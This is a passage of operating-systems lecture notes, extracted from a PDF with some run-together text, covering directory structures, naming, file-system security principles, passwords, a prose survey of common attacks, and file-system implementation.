do its job. but there is a system call to find out the real uid of the current process. 166 .appropriate to the mail system.

For example. Flat file systems are not often used because they provide no inherent organization to the files and are difficult to make efficient for large collections of files. which will never completely die. a single directory doesn’t scale easily to many users. Consider scanning the system directory to print all the files that I own. or we have to introduce a very fine-grained locking mechanism.HOME. The Palm Pilot has a flat file name space. Hierarchical Directories A natural organization of files is into a hierarchy. a collection of my files might have names like: DISK1. IBM MVS.GRADES Problems with this include enforcing the conventions (what if other users choose $ to separate parts of the file name?) and the inefficiency of holding all the system’s files in one big list. both in terms of technical operation and user behavior. although they still do exist. and scanning a large table linearly is not efficient. and synchronization is maintained for each directory.FABER. Keeping a large list sorted adds overhead. A common one is to prepend filenames with the user’s name. • • • • All Files User files Instructor files Faber’s files This is implemented as a tree of directories where each entry in the directory describes either a file or another directory. 167 . If the hierarchy is chosen carefully. Name space collisions have to be avoided in a flat space. These are rarely used today.PROFILE DISK1.Flat Directories The simplest kind of directory is a simple flat list of filenames and the information needed to find the respective file contents.FABER. the result is many small directories. or it will have to be kept sorted.all file creations and deletions will have to enforce exclusion on the table. Either the whole table will have to be searched. so generally some naming convention is followed to prevent them. has a flat file name space. Also updating such a centralized structure will require synchronization . Because separate tasks can be confined to separate directories contention can be made rare. Basically. That is files can be seen as being in related classes and each class has a directory.PROJECT1. Scanning each one is a reasonable amount of work.

Most OSes require the directory to be empty. To preserve the tree structure of hierarchical file systems. the hierarchical nature of the file system (like system utilities) can detect and ignore them. This is done by giving a path through the directory tree. A character is chosen as the path separator. If the information about a file (its attributes and OS data) are not stored directly in a directory entry. Delete: Remove a directory. One solution is to add the concept of a current directory to the system and allow paths to be specified relative to it. These paths can be absolute or relative. These are often and. they generally can’t link to directories. It’s possible that a symbolic link can point to a file that no longer exists. hierarchies are a natural way to organize many systems of data. Soft links are a path translation (often also called a symbolic link). To facilitate relative naming. Because they are a translation. They are a pathname that points to the file (or directory) on which to operate. soft links can access any parts of the file system they can address. Because they are a visible pathname translation./-f . they may not be updated when a file is deleted or moved. and in some systems offer the opportunity to give a file multiple names.Besides the efficiency issues. In general hard links are restricted to parts of the file system that share internal information. The desktop metaphor of files in folders and cabinets underscores this (although the hierarchy afforded by hierarchical file systems is richer because there can be nearly arbitrary levels of nesting). Paths that begin with the path separator are absolute pathnames. a file cannot be deleted without deleting all its hard links. they are often allowed to point to directories because programs that rely on the. Given that we want to impose such a structure on our file names. respectively. but because they are not linked closely with the internal structure of the file system. many filesystems have special names that refer to the current directory and the parent directory. Such multiple naming is called linking. The solution is to use a longer relative path: rm . This is called a dangling pointer problem by analogy with the same problem involving freed memory in a program. There are 2 major forms of links: hard and soft. Using / as a separator. It’s inconvenient to name files with their entire pathname all the time. which means the file test in the directory test which is a subdirectory of the current directory.1 an example relative pathname is. a file may be pointed to by entries in several directories. 168 . a pathname for the file labelled file in the above diagram is /etc/ast/fn. paths that do not are relative and have the current directory prepended. A path is then the list of directories traversed in order to reach the file. The strings that represent such paths are called pathnames. and specifying the long pathname hides that. A hard link is a direct link from the directory entry to the internal file data. Links Directories impose a naming structure on files./test/halt. For example the file in the directory tree above can be named as /etc/ast/fn or /etc/jim/f2. after all we put related files in the same directory so they’d be close together. Directory Operations Like files. and in file systems that support them. directory provides the answer to a UNIX® puzzle: how do you delete a file named -f? rm -f fails as the filename is taken as a switch. we have to describe a syntax to find a file in the tree. directories have well defined operations: Create: Allocate space for a new directory and create the special directories in it. All hard links are equivalent.

type=published-paper. Temporal filesystems. Some other interesting naming systems are: • The Domain Name System: hierarchical distributed naming of computers on the Internet. there are some other interesting ways to think about file naming: • Attribute-based naming. Write: Change the information about one or more files. • • 169 . Being able to name a resource is the first step in being able to manipulate it. Rather than overwriting files for each update. It’s a strange but powerful idea. INST=ISI. topic = RST packets). A naming system maps a string to a resource (or maybe just to another string). Rename: Really covered by write. User specific. You can change directory into the source code from last week. Metadata manipulation: Change the permissions or some other field associated with this directory.500 is an alternative attribute-based naming system for hosts and users. For example the filename above might be (user=faber. Unlink: Remove a link to an existing file (if this is the last link and the file is closed. Not all data can be organized nicely into a hierarchy. you can also give a temporal coordinate. Link: Add a link to an existing file. they save all the versions (well. IN=USC. The folks at Lucent have added a time axis to their Plan 9 filesystem. The names look like PN=faber. The folks from Lucent also allow dynamic binding of their file systems. A user specifies a set of directories to bind to a name. Printer names. Read: Get the information about one or more files.) X. Strings bind to printers in a flat namespace. actually they save the state once a day) and in addition to giving a pathname. For example is the right hierarchy /usr/faber/pubs/papers/RST or /usr/faber/papers/published/ RST? Attribute based naming says that filenames should be the set of attributes that a file satisfies. The names are parsed backward − edu is resolved before use before aludra in aludra.Open: Analogous to file open.”. as is file renaming Other Directory Systems Although hierarchical systems are by far the most common. • • Naming Systems The mapping from pathname to filename is just one example of a naming system.edu. and thereafter the user has their own version of that directory. DEPT=CS. CO=US. (The path Separator is a “.usc. Each “Directory” or domain is resolved by a different machine in the Internet. The idea of an execution path is turned into a customized /bin directory. this usually implies removal of the file).

don’t break into someone’s account here and start deleting files. however. and an employee photocopies printouts of your new chip design. Security and the File System File System Security The problem addressed by the security system is how are information and resources protected from people. The reason is that the security community as a while reviews them and reports flaws that can be fixed. finding loopholes in security systems and understanding them to the point of breaking them is a challenge. and how to name them is significant. These are all statements of (significantly different) policies: Users should not be able to read each other’s mail No student should be able to see answer keys before they are made public.• URLs: a combination of DNS and hierarchical filenames. Policies and Mechanisms Policies are real world statements about the protection that the system provides. I understand the lure of this. Uninvited intrusions should be dealt with harshly (for example. For certain people who like puzzles. or the system is insecure. some overriding principles make sense. Breaking into another person’s files is like breaking into their home. but the file system is a particularly good place to discuss security because its protection mechanisms are visible. and the things it protects are very concrete (for a computer system). Here is a list generated by Saltzer and Schroeder from their experience on MULTICS that remain valid today (these are fun to apply to caper movies . 170 .next time you watch Mission Impossible or Sneakers or War Games. Design Principles Although every security system is different. The decision of what elements in a system to name. All users should have access to all data. and should not be taken lightly either by those breaking in. If you really want to play around with UNIX® security. Remember. Most successful systems have a significant naming component. The various systems in a computer system that control access to resources are the mechanisms that are used to implement a policy. try to spot the security flaws that let the intruders work their magic): Public Design Surprisingly public designs tend to be more secure than private ones. or those who catch them. which is an accounting issue. the name of the machine to contact. The name compactly describes the communication protocol to use. Issues include the contents of data files which are a privacy issues. If your computer is perfectly secure. and the use of resources. that everyone using these machines is a student like yourself who deserves the same respect that you do. We’re talking about some interesting stuff when we talk about security. get yourself a linux box and play to your heart’s content. A good secuirty system is one with clearly stated policy objectives that have been effectively translated into mechanisms. Security must pervade the system. and the file in to ask about (or other service dependent identifier). don’t blame the computer security system. it’s a felony to break into a machine that stores medical records). The fact that data security does not stop with computer security cannot be understated.

if a security feature is too onerous to the users. it must be simple and capable of being applied uniformly. Processes in given domains are allowed to enter other domains. The system must be acceptable to the users. A process’s initial domain is a function of the user who starts the process and the process itself. Domain File1 File 2 Domain 1 Domain 2 1 RW RWX . It sounds like apple atitude. Imagine a matrix of all protection domains on one axis and all system resources (files) on another. Default access is no access. An unacceptable security system is automatically attacked from within. These circumventions are then available for the attackers. The more privilege an entity possesses the more costly a mistake or misuse of that entity is. This holds for subsystems just like login screens. While the pure domain model makes protection easy to understand.Enter 2R--Notice that once domains are defined. and as a practical matter security is nearly impossible to add to a fundamentally insecure system. Furthermore. A Sampling of Protection Mechanisms The idea of protection domains originated with Multics and is a key one for understanding computer security. There are too many holes to plug. the good guys should. the ability to change domains becomes another part of the domain system. you should assume that attackers have access to your code. but is a principle worth following at all levels. All security systems are a compromise between security and usability. Some Domains and Rings 171 . Test the authority every time so that revocation of that authority is meaningful. Holding the domains as a matrix doesn’t scale. People who need a certain access will let you know about it quickly. In order to make such a design integrable. The contents of each cell in the matrix is the operations permitted by a process (or thread) in that domain on that process. Adding security later almost never works. Give each entity the least privilege required for it to do its job. Printer daemons that run as root can cause logins that run as root.Even if you take pains to keep the source code of your system secret. too. the more likely opportunities there are for exploitation. Build in security from the start. The bad guys will share knowledge. This may mean creating a bunch of fine-grained privilege levels. they will just invent ways to circumvent them. Test for current authority just because the user had the right to perform an operation a millisecond ago doesn’t mean they can do it now. it is almost never implemented. The more features a system has.

making copies with reduced or amplified rights. Generally the ACL languages are rich enough to describe users and groups of users economically. and the owner wants to stop that. each file contains a list of the users that can operate on the file. When the owner of a file is root. That is when a user is reading the file. An authentication system proves the identities of elements with which a computer system interacts.UNIX divides processes into 2 parts. One way is in hardware . 172 . and decides what it will do on a user’s behalf based on credentials stored in the PCB. a user part and a kernel part. When the process presents the capability to the OS. the owner can remove that right. Wildcarding provides a way to describe all users meeting a given criterion. the OS need not verify anything about the user. A third is to have the OS encrypt the capabilities with a key unknown to the user. Conceptually. memory rights in a memory pointer. They are the setuid bits that allow processes running the program to change user or group id to be that of the owner of the file. That property makes it hard to revoke a capability. only whether the capability is valid. it has to trap into the kernel. ACLs are useful and support revocation of rights. and to access hardware. This can include users and other systems. There are 9 (really 12) bits associated with each file that determine the read. exclusion operators allow exclusion of a set of users. Rather than 2 levels. Access Control Lists Another representation of the domain concept is Access Control Lists (ACLs). Authentication and Security Central to the idea of protection systems is the idea of an authentication system. this can convey considerable new power on the process. and checked similar credentials before using its increased powers. The kernel can access all OS and hardware. members of the owning group and everyone else. This economy comes from wildcarding and exclusion operators. Capabilities Another way to encode domain rights is to encode a processes rights in its pointer to the object. Capabilities are kept in special lists (called C-lists) that must be protected from processes direct manipulation. These are lists attached to each resource (file) that describe the valid operations on them. Another is to make the C-list part of the PCB and only manipulable by the OS. Because the system checks current authority (see above) the read will be stopped. although there are a couple ways: embedded validity checks and indirect access. though. For example file rights would be in the file descriptor. write and execution permissions of the owner. When running as a user the process has limited abilities. 2 of the other 3 bits allow limited domain switching. Such pointers with protection information encoded in them are called capabilities.the memory actually contains bits that the CPU cannot touch in user mode that determine that a memory location holds a capability. but simplified. Capabilities have operations defined on them. like copying. MULTICS had a 64 ring system where each ring was more privileged than the ones surrounding it. The UNIX file protection system is similar. This is a simplification of the MULTICS system of protection rings.

608 3-letter (cap and lower case) passwords. authentication should be 2-way: The user should authenticate to the machine.In distributed systems. Most systems allow eight or ten letters . it’s still impossible to easily invert the function. you should change them relatively frequently . Hopefully education has gotten better. The most common shared secret is a password. In my opinion you’re better off not using any English. Computer passwords are often the weakest part of a computer security system. The system uses a 1-way function. Systems like UNIX® don’t store the password. especially if the passwords can be guessed off-line . Note that “common phrase” means anything available in the system dictionary. and nonEnglish words fare little better.. To check a user’s password. at least. Don’t get too attached to it. 173 . e. but difficult to invert (essentially the only way to invert it is to compute all the forward transforms looking for one that matches the reverse). Passwords can be stolen (physically or electronically) or guessed. there are more than 50 trillion 8-letter combinations. There are only 140. without immediately giving away the contents of the password. A seminal work in computer security ran a cracking program on a couple hundred donated password files that tested common English words and the top 100 (or so) female names and had an ungodly (better than 50%) hit rate. Note that even knowing the algorithm and the encrypted password. Don’t write it down. A 1-way function is an interesting function that is relatively easy to compute. but the result of a 1-way function on the password. You’ve changed a difficult puzzle into a physical search. Guessing 1 in 50 trillion is a literally half a billion times harder than 1 in 140. either.000. and compares it with the result in the password file. Generally authentication is accomplished by means of the exchange of a shared secret.that is without alerting the system under attack that it is under attack. There are several good rules for choosing a computer password: • Choose a long one. the password was (with high probability) correct.use ’em all. *&$ˆ@. Include some non-letters. the system takes the password as input. • • • Password Storage It’s possible to store passwords in the open. • Don’t use a common phrase or name. and the machine to the user. computes the 1-way function on it.every six months or so is a good idea. where people who wanted access to a military facility had to recite such an unusual phrase to establish their identity to those inside the fort.g. If they match. The analogy is to physical passwords. Passwords A password is a string of characters that the user and computer system agree will establish the user’s identity to the system. No science fiction or fantasy words.

retina. so rather than having to try all the passwords (or half the passwords on average). • • • • • • • • Physical ID Another shared secret can be physical attributes of the human who wants to access the system. One way to beat a thumbprint scanner is to physically acquire someone’s thumb. The advantage is that if an attacker manages to steal the password. it cannot be reused. fingerprints. Code books .Although it’s theoretically reasonable to leave a hashed password file in the open. Other Shared Secrets Some other forms of shared secrets include: Shared Real Secrets . When the user tries to log in the computer asks him/her for the next password in the sequence.a frequent system is to ask the user for a word from a code book. it is rarely done anymore. 174 . For example if the function were the square root. etc. It practice it means that the pirate photocopied the manual. the computer presents the user with a value (called the challenge) and the user responds with the transform of the value. By forcing the attacker to actually try passwords on the system that they’re invading. One time passwords . There are a couple reasons: These are also called hash functions. to gain access to a program the program would ask the user for the nth word on the m-th page of the manual. the system can detect an attack. It also raises the grisly possibility of theft of those features. Controlling access based on physical features has problems if the features are damaged (cutting one’s fingertip should confuse a fingerprint scanner).the user gives the system some information that “only the user knows” and the system quizzes the user on it instead of a password. In practice. not that the intruder can. each of which is to be used once.The system and user agree on some (one-way) function or transformation. Good. trying a large dictionary of common passwords is often enough to break into an account on the system. the functions are more complex and usually encoded in hardware. in that the user rarely has to write such information down. bad passwords are not uncommon enough. • In practice. a challenge of 9 would be correctly answered with a response of 3. Password file can be attacked off-line. with the system under attack completely unaware that it is under attack. The hardware is often password protected so that theft of the hardware only means that the user cannot log in. The disadvantage is that an attacker can steal the list (and a user is unlikely to memorize a set of single use passwords). This was in vogue for a while with anti-piracy systems. At login time.the computer generates a table of passwords for the user. Bad in that there isn’t much information that can’t be found by a determined investigator. Several body measurements identify a user with significant precision: finger lengths. Challenge/Response .

The distinction is in the method of transmission: a virus needs a host program to be run to propagate it. The two can work out the timing and loading (statistically. it propagates itself.This is a benign program that steals information as part of its function. though . a worm has no such host. Loading the machine corresponds to a 1 and unloading the machine a 0. One of the well known offenders here is sendmail. Both have made national news for in their malevolent forms. The listening process knows that if it’s computation takes longer than usual. Buffer overruns .sometimes developers leave privileged debugging hooks in place in production systems.A Sampling of Attacks Some common attacks on computer systems: Trojan Horse . Worms are self replicating independent programs. takes a user’s password. Passwords were checked letter-by-letter. Other production systems used to ship with well known user names with well-known passwords for remote maintenance. if necessary) to communicate.one can imagine benign programs propagated the same way . TENEX allowed user functions to be called on each page fault. if 2 processes banned from communicating directly can use the following scheme: one process repeatedly performs a computation known to take a fixed time. record a 0. the system would have to guarantee system load to be fixed. Systems that hold serious enough data. An Example is a script that mimics the login prompt. If the first letter was correct.) Most systems don’t stop covert channels.we talked about this with passwords. often for malicious purposes. equentially. This is an interesting example of how multiple OS feature combine to affect security. but both could be used for benign purposes. Some clever user realized that this allowed password guessing by the letter instead of one letter at a time. By repeating the process the whole password could be guessed sequentially. Covert channels are necessarily low bandwidth. An attacker simply lies to a human being and gets the information that they want. The password being guessed had one.virus checkers for example).forcing a program to overrun a variable on the stack and insert code in it that the attacker wants run. and stopping them is difficult. The other process alternately loads and unloads them machine with computationally intensive child processes depending on the bit it wants to send.This is by far the most difficult to control. Social Engineering . 175 . I pause to mention the infamous TENEX security hole that Tannenbaum discusses. it should record a 1 and if it’s shorter. The only real cure for this is to educate anyone who has security information (that is everyone) about security. saves it for the owner of the script and logs the user in. Password Guessing . (They needn’t be. which was forced out of memory. Letter on one page and the rest on another. which would mean slowing the system when it was unloaded. (In the example above. The legitimate user has access to the account. Backdoors . Viruses and Worms Viruses are programs contained in other programs. Covert Channels A covert channel is an unintentional communication channel in the system. but so does the owner of the script. For example. there would be a page fault when the system faulted he second into memory to check it.

Each user can have lots of files. one per “user. To access a segment from the file system. which makes it easier to organize persistent data. there was no difference whatsoever. If the block of the file containing this value wasn't in memory. the program could access the number with a notation like a rather than having to seek to the appropriate offset and then execute a read system call. so a file can be any length (not just a multiple of the block size) and programs can read and write arbitrary regions of the file without worrying about whether they cross block boundaries. making it appear to be a large number of disk-like objects called files. Everything in Multics was a segment. the array access would cause a page fault. The address space of each running process consisted of a set of segments (each with its own segment number). Like a disk.” the file system beautifies the hardware disk. a process would pass its name to a system call that assigned a segment number to it. reliably. The fact that there are lots of files is one form of beautification: Each file is individually protected.CHAPTER 11 FILE SYSTEM IMPLEMENTATION First we look at files from the point of view of a person or program using the file system. without the expense of requiring each user to buy his own disk. if the segment was an array of integers. which was serviced as explained in the previous chapter. so each user can have his own files. and persistently. a file is capable of storing a large amount of data cheaply. From then on. Systems use the same sort of device (a disk drive) to support both virtual memory and files. and then we consider how this user interface is implemented. The answer is that they don't. In Multics. The filesystem also makes each individual file more beautiful than a real disk. Some systems (not Unix) also provide assistance in organizing the contents of a file. The User Interface to Files Just as the process abstraction beautifies the hardware by making a single CPU (or a small number of CPUs) appear to be many CPUs. with vastly different user interfaces. For example. the process could read and write the segment simply by executing ordinary loads and stores. and the “file system” was simply a set of named segments. 176 . it erases block boundaries. At the very least. The question arises why these have to be distinct facilities.

The real reason single-level store is not ubiquitous is probably a concern for efficiency. Most new processors introduced in the last few years allow 64-bit virtual addresses. Naming Every file system provides some way to give a name to each file. While there appears to be no reason in principle why memorymapped files cannot be made to give similar performance when they are accessed in this way. so it should be easy for humans to use. it is awkward. if it is easy to jump around in a file. So there is no reason why the virtual address space of a process cannot be large enough to include the entire file system. The upper bound of 64K words per segment was considered large by the standards of the time. The usual file-system interface encourages a particular style of access: Open a file. and then close it. Most modern operating systems (including most variants of Unix) provide some way for processes to share portions of their address spaces anyhow.” is a great idea.This user-interface idea. So why is it not common in current operating systems? In other words. and talk about directories later. Multics showed that this doesn't have to be true. Besides. why are virtual memory and files presented as very different kinds of objects? There are possible explanations one might propose: The address space of a process is small compared to the size of a file system. and the file system will be blamed. Different operating systems put different restrictions on names: Size 177 . jumping around and accessing the data in tiny pieces. but each segment was limited to 64K words. a process could have up to 256K segments. The name of a file is (at least sometimes) meant to used by human beings. While it is possible to access a file like an array of bytes. so this is a particularly weak argument for a distinction between files and segments. applications programmers will take advantage of it. In Multics. Permanent segments to raise a need for one “file-system-like” facility. in practice. go through it sequentially.” meaning that it should be preserved after the process that created it terminates. We will consider only names for individual files here. Files are shared by multiple processes. There is no reason why this has to be so. The virtual memory of a process is transient--it goes away when the process terminates--while files must be persistent. such processors will dominate. Multics allowed for lots of segments because every “file” in the file system was a segment. overall performance will suffer. the ability to give names to segments so that new processes can find them. the added functionality of mapped files always seems to pay a price in performance. A segment can be designated as “permanent. while the virtual address space of a process is associated with only that process. Operating system designers have found ways to implement files that make the common “file like” style of access very efficient. sometimes called “single-level store. In a few years. the hardware actually allowed segments of up to 256K words (over one megabyte). copying big chunks of it to or from main memory.

and presents each file as a “smooth” array of bytes with no internal structure. which devotes 16 bits to each character rather than 8 and can represent the alphabets of all major modern languages from Arabic to Devanagari to Telugu to Khmer. and most modern version of Unix allow names to be essentially arbitrarily long.Some systems put severe restrictions on the length of names. but many utility programs (such as the shell) would have troubles with names that have spaces. Unix internally makes no such distinction. In DOS and its descendants. Some systems translate names to one case (usually upper case) for storage. I say “essentially” since names are meant to be used by humans. Case Are upper and lower case letters considered different? The Unix tradition is to consider the names Foo and fop to be completely different and unrelated names.” you could open it as “foo” or “FOO. and in fact alphabets other than Latin. When the name is displayed. For example DOS restricts names to 11 characters. For example. Application programs can. it is not uncommon to see a file name with the Copyright symbol © in it). Others retain the original case. but it is a common convention to include exactly one period in a file name (e. control characters or certain punctuation characters (particularly ‘/’). however. MacOS allows all of these (e. if they wish. File Structure Unix hides the “chunkiness” of tracks.extension. restrict names to a limit of 255 characters. for example. File Types 178 .g. it is represented as base. Windows 95. it is becoming increasingly important to support languages other than English. foo. With the world-wide spread of computer technology.. so they don't really to to be all that long. DOS requires that each name be compose of a bast name of eight or less characters and an extension of three or less characters. The Unix directory structure supports names containing any character other than NUL (the byte consisting of all zero bits). a wide-spread convention in Unix is to use the newline character (the character with bit pattern 00001010) to break text files into lines. sectors. Format It is common to divide a file name into a base name and an extension that indicates the type of the file. For example.g. but consider it simply a matter of decoration. Most modern versions of Unix. etc.” but if you list the directory. Character Set Different systems put different restrictions on what characters can appear in file names. use the bytes in the file to represent structures. The most common are files that consist of an array of fixed or variable size records and files that form an index mapping keys to values. while early versions of Unix (and some still in use today) restrict names to 14 characters.c for a C source file). A name that is 100 characters long is just as difficult to use as one that it forced to be under 11 characters long (but for different reasons). if you create a file named “Foo. Indexed files are usually implemented as B-trees. you would still see the file listed as “Foo”. Some other systems provide a variety of other types of files. There is a move to support character strings (and in particular file names) in the Unicode character set. The Macintosh operating system. they are considered the same.

Usually.g. The possibilities are endless.java. it is useful to distinguish text files from binary files. The PDP-11 computer is extinct by now. jumps to the word following the 16-byte header. within binary files there are executable files (which contain machine-language code) and data files. sequential access also allows a rewind operation. Random: Read or write the nth record or bytes i through j. C or Java) or they may be human-readable text in some mark-up language such as html (hypertext markup language). but associated with it. which happens to be the machine code for a branch instruction on the PDP-11 computer. 179 . and sometimes it's enforced by the OS or by certain programs. however. • • Some systems enforce the types of files more vigorously than others.g. Data files may be classified according to the program that created them or is able to interpret them. Unix only provides enough meta-data to distinguish a regular file from a directory (or special file). the Unix Java compiler refuses to believe that a file contains Java source unless its name ends with . text files might be source files in a particular programming language (e.Most systems divide files into various “types. one of the first computers to implement Unix. partially because the term “type” can mean different things in different contexts. and “regular” files. such as a header made up of the first few bytes of the file. File types may be enforced • • • • Not at all. or By the operating system itself. The operating system could run a file by loading it into memory and jumping to the beginning of it. In Unix. the magic number is the octal number 0407. Unix provides an equivalent facility by adding a seek operation to the sequential operations listed above. In the original Unix executable format. Within this category. Unix tends to be very lax in enforcing types. but other systems support more types. By certain programs (e. Just about any type of file is considered a “regular” file by Unix. Sequential: Read or write the next record or next n bytes of the file. but it lives on through the 0407 code! The type of a file may be indicated by its name. called the a. two kinds of special files (discussed later).out format. This packaging of operations allows random access but encourages sequential access. which is the beginning of the executable code in this format. a file may be a Microsoft Word document or Excel spreadsheet or the output of TeX. Sometimes this is just a convention. e.g. Unix initially supported only four types of files: directories. the Java compiler). The 0407 code. files that store executable programs start with a two byte magic number that identifies them as executable and selects one of a variety of executable formats. Access Modes Systems support various access modes for operations on a file.. interpreted as an instruction. For example. In general (not just in Unix) there are three ways of indicating the type of a file: • The operating system may record the type of a file in meta-data stored separately from the file.” The concept of “type” is a confusing one. The type of a file may be indicated by part of its contents. Only by convention.

a standard API (application programming interface) based on Unix. the “key” need not be unique--there can be more than one record with the same key. Unix records a fixed set of attributes in the meta-data associated with a file. then get other records with the same key by doing sequential reads. or store it in a file with a related name (e. For example MacOS records an icon to represent the file and the screen coordinates where it was last displayed. Unix maintains the last three of these. Misc Some systems have attributes describing how the file should be displayed when a directly is listed. Time stamps Time created. but by whom. Sizes Current size. Type Information As described above: File is ASCII.Indexed: Read or write the record with a given key. Some systems record not only when the file was last modified. Attributes can also be grouped by general category. etc. Unix achieves a similar effect by convention: The ls program that is usually used to list files does not show files with names that start with a period unless you explicit request it to (with the -a option). access-control list (information about who can to what to this file. perhaps the owner can read or modify it. time last accessed. time the attributes were last changed. In this case. File Attributes This is the area where there is the most variation among file systems. attribute-value) pairs.attributes”). put it into the body of the file itself. Other systems (notably MacOS and Windows NT) allow new attributes to be invented on the fly. is an Excel spread sheet. If you want to record some fact about the file that is not included among the supported attributes. each file has a resource fork. DOS has a “hidden” attribute meaning that the file is not normally shown. is a “system” file. Indeed. In MacOS. owner's “group. which is a list of (attribute-name. programs use a combination of indexed and sequential operations: Get the first record with a given key. and others have no access). The attribute name can be any four-character string. etc.” creator. size limit.g. and the attribute value can be anything at all. you have to use one of the tricks listed above for recording type information: encode it in the name of the file. “foo. Name Ownership and Protection Owner. Operations POSIX. is executable. for example. space consumed (which may be larger than size because of internal fragmentation or smaller because of various compression techniques). some kinds of files put the entire “contents” of the file in an attribute and leave the “body” of the file (called the data fork) empty. other members of his group can only read it. provides the following operations (among others) for manipulating files: 180 . time last modified. In some cases. “high-water mark”.

Operation: An integer code. Mode: A bit-mask specifying protection information. owner. mode) or fchmod(fd. group) status = chmod(name. A “file descriptor”. etc).) The close call simply announces that fd is no longer in use and can be reused for another open or creat. size) or ftruncate(fd. Status: Many functions return a “status” which is either 0 for success or -1 for errors (there is another mechanism to get more information about went wrong). but creates a new (empty) file. byte_count) offset = lseek(fd. Name: A character-string name for a file. The open call finds a file and assigns a decriptor to it. buffer) status = utimes(name. operation) fd = creat(name. from end. 181 . Other functions also use -1 as a return value to indicate an error. (Most modern versions of Unix have merged creat into open by adding an optional mode argument and allowing the operation argument to specify that the file is automatically created if it doesn't already exist. The mode argument specifies protection attributes (such as “writable by owner but read-only by others”) for the new file. size) Some types of arguments and results need explanation. mode) status = truncate(name. mode) status = close(fd) byte_count = read(fd. read/write. temporary name for a file during the lifetime of a process. and perhaps a few other possibilities such as append only. read and write. buffer) status = fstat(fd. signifying from start. which is a small non-negative integer used as a short. Buffer: The memory address of the start of a buffer for supplying or receiving data. byte_count) byte_count = write(fd. buffer. or from current location. It also indicates how the file will be used by this process (read only. times) status = chown(name. newname) status = unlink(name) status = stat(name. offset.• • • • • • • • • • • • • • fd = open(name. one of read. owner. group) or fchown(fd. whence) status = link(oldname. write. buffer. Whence: One of three codes. The creat call is similar.

and now found in virtually every operating system. the system automatically deletes it when there are no remaining names for it. chmod updates protection information. we will describe two different ways to implement multiple names for a file. particularly if there are multiple uses independently making up names. To any Unix system. Multics uses `>'. Each file is named by a sequence of names. You probably already know about hierarchical directories. the starting location in the file (called the seek pointer is wherever the last read or write left off. “solomon”). each uses a different character to separate the components of the sequence when displaying it as a character string. while unlink removes a name. depending on the value of whence. For example. and perhaps a few more. and MacOS uses ':'. but I would like to describe them from an unusual point of view. Most come in two flavors: one that take a file name and one that takes a descriptor for an open file. and then use this prefix for all files in the project. The function link adds a new name (alias) to a file. or the current size of the file. When I start a new project. Sequences make it easy to avoid naming conflicts. If there are a lot of files in a system. When we consider implementation. where system calls are explained. documented format). is not necessarily a good thing. The result is the number of bytes transferred. each with slightly different semantics. but only truncate can make them smaller). The symmetrical condition. indexed or indexed sequential files would require a version of seek to specify a key rather than an offset. written in Unix as /usr/solomon. For example. Other systems have similar operations. I might choose /usr/solomon/cs537 for files associated with this course. The User Interface to Directories We already talked about file names. The specified offset is added to zero. then popularized by Unix. while the remaining functions can be used to update the meta-data: utimes updates time stamps. One important feature that a file name should have is that it be unambiguous: There should be at most one file with any given name. A better idea is the hierarchical directory structure. I can create a new sequence by appending the name of the project to the end of the sequence assigned to me. So far. The starting location in memory is indicated by the buffer parameter. For read it may be smaller if the seek pointer starts out near the end of the file. The lseek operation adjusts the seek pointer (it is also automatically updated by read and write). Sometimes it is handy to be able to give multiple names to a file. the current seek pointer. For write it is normally the same as the byte_count parameter unless there is an error. There is no function to delete a file. it may be difficult to avoid giving two files the same name.The read and write operations transfer data between a file and memory. In some early operating systems. It is also common to have a separate append operation for writing to the end of a file. One technique to assure uniqueness is to prefix each file name with the name (or user id) of the owner. chown updates ownership. assign a sequence to each user and only let him create files with names that start with that sequence. For example. that was the only assistance the system gave in preventing conflicts. First. and then explain how this point of view is equivalent to the more familiar version. that there be at most one name for any given file. Although all modern operating systems use this technique. and 182 . The ‘2’ means to look in section 2 of the manual. But it allows me to further classify my own files to prevent conflicts. first introduced by Multics. DOS and its descendants use ‘\’. this is the same as just appending the user name to each file name. The stat function retrieves meta-data about the file and puts it into a buffer (in a fixed. and truncate changes the size (files can be make bigger by write. Unix uses ‘/’. I might be assigned the sequence (“usr”.

the system allows me to specify a “default prefix” and a short-hand for writing names that start with that prefix. As an extra aid. We also lose the advantage of very fast sequential access to the file since its blocks may be scattered all over the disk. and there is no external fragmentation. Linked List: A file is represented by the block number of its first block. and whenever I use a name that does not start with ‘/’. With this rule. To find the 100th block of a file. this is how the directory system is actually implemented. we have to read the first 99 blocks just to follow the list. if we are careful when choosing blocks to add to a file. It may be impossible to follow the directions (because they tell us to use an edge that does not exist). n+1. Even then.name them /usr/solomon/cs537/foo. Start at the root node and treat the path name as a sequence of directions. they will lead us unambiguously to one node. This representation avoids the problems of the contiguous representation: We can grow a file by linking any disk block onto the end of the list. same cylinder) so that the arithmetic difference between the numbers of two blocks gives a good estimate how long it takes to get from one to the other. There are (at least!) four possibilities: Contiguous: The blocks of a file are the block numbered n. Otherwise. In Unix. However. Each path in the graph is associated with a sequence of names. The advantages of this approach are • • It's simple The blocks of the file are all physically near each other on the disk and in order so that a sequential scan through the file will be fast. as we will see. As a practical matter. telling us which edge to follow at each step. n+2. but if is possible to follow the directions. For that reason. and each block contains the block number of the next block of the file. and the rule is enforced that there cannot be two edges with the same name coming out of one node. we can retain pretty good sequential access performance. the system automatically adds that prefix. since it clear separates the interface from the implementation. /usr/solomon/cs537/bar. In fact. However. I think it is useful to think of “path names” simply as long names to avoid naming conflicts. we can use path name to name nodes. 183 .. you would have to find a long enough run of free blocks to accommodate the new length of the file and copy it. First let's consider how to represent an individual file. We will further assume that blocks with numbers that are near each other are located physically near each other on the disk (e. with names on the edges..g. However. Implementing File Systems Files We will assume that all the blocks of the disk are given block numbers starting at zero and running through consecutive integers up to some maximum. we can represent any file with a pair of numbers: the block number of first block and the length of the file (in blocks). storage allocation has all the problems we considered when studying main-memory allocation including external fragmentation. Thus path names can be used as unambiguous names for nodes. the sequence of names is usually called a path name. m. I use the system call chdir to specify a prefix. It is customary to think of the directory system as a directed graph. One node is designated as the root node.. The problem with this organization is that you can only grow a file if the block following the last block in the file happens to be free. the names on the edges that make up the path. etc. it introduces a new problem: Random access is effectively impossible.. . operating systems that use this organization require the maximum size of the file to be declared when it is created and pre-allocate space for the whole file.

